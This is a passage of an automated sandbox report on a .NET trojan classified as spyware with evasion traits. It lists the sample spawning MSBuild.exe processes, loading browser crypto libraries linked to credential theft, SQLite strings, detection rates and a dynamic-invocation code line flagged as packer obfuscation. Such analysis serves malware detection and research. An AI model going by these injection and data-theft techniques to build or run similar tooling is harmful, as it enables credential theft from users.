                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6B05704_2_6C6B0570
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C7585504_2_6C758550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6685404_2_6C668540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C7145404_2_6C714540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6DA5E04_2_6C6DA5E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C69E5F04_2_6C69E5F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6045B04_2_6C6045B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C66C6504_2_6C66C650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C66E6E04_2_6C66E6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6AE6E04_2_6C6AE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6346D04_2_6C6346D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6907004_2_6C690700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C63A7D04_2_6C63A7D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C79D930 appears 33 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C5A94D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C79DAE0 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C639B10 appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C59CBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00402000 appears 287 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C633620 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C7909D0 appears 172 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812
                        Source: file.exe, 00000000.00000002.1689890749.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                        Source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePE.dll& vs file.exe
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSWxnr.dll0 vs file.exe
                        Source: file.exe, 00000000.00000000.1683221894.000000000065C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupergamesoft.exe$ vs file.exe
                        Source: file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSWxnr.dll0 vs file.exe
                        Source: file.exe, 00000000.00000002.1691045839.0000000002A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs file.exe
                        Source: file.exe, 00000000.00000002.1691045839.0000000002A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                        Source: file.exe, 00000000.00000002.1691045839.0000000002A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
                        Source: file.exe, 00000000.00000002.1706153820.0000000005533000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSWxnr.dll0 vs file.exe
                        Source: file.exeBinary or memory string: OriginalFilenamesupergamesoft.exe$ vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 0.2.file.exe.5400000.14.raw.unpack, fDX9tehJ5EFemhKZwc.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.file.exe.5400000.14.raw.unpack, fDX9tehJ5EFemhKZwc.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.file.exe.42540c0.2.raw.unpack, viSFIRaCy.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSB4098: MSBuild is invoking VCBuild to build this project. Project-to-project references between VC++ projects (.VCPROJ) and C#/VB/VJ# projects (.CSPROJ, .VBPROJ, .VJSPROJ) are not supported by the command-line build systems when building stand-alone VC++ projects. Projects that contain such project-to-project references will fail to build. Please build the solution file containing this project instead.
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSB4126: The specified solution configuration "{0}" is invalid. Please specify a valid solution configuration using the Configuration and Platform properties (e.g. MSBuild.exe Solution.sln /p:Configuration=Debug /p:Platform="Any CPU") or leave those properties blank to use the default solution configuration.
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: yMSB4051: Project {0} is referencing a project with GUID {1}, but a project with this GUID was not found in the .SLN file.
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/24@2/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,4_2_6C5C7030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,4_2_00411400
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,4_2_00410900
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6512
                        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\153a8cdf-ac09-4931-85d0-e1eecfa040c1Jump to behavior
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: file.exeReversingLabs: Detection: 32%
                        Source: file.exeVirustotal: Detection: 24%
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mscorjit.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: file.exeStatic file information: File size 6581760 > 1048576
                        Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x637c00
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: supergamesoft.pdb( source: file.exe
                        Source: Binary string: PE.pdbH] source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: supergamesoft.pdb source: file.exe
                        Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\SWxnr.pdb source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1706153820.0000000005533000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2372726063.0000000038643000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: PE.pdb source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2366512276.000000002C765000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 0.2.file.exe.5400000.14.raw.unpack, fDX9tehJ5EFemhKZwc.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
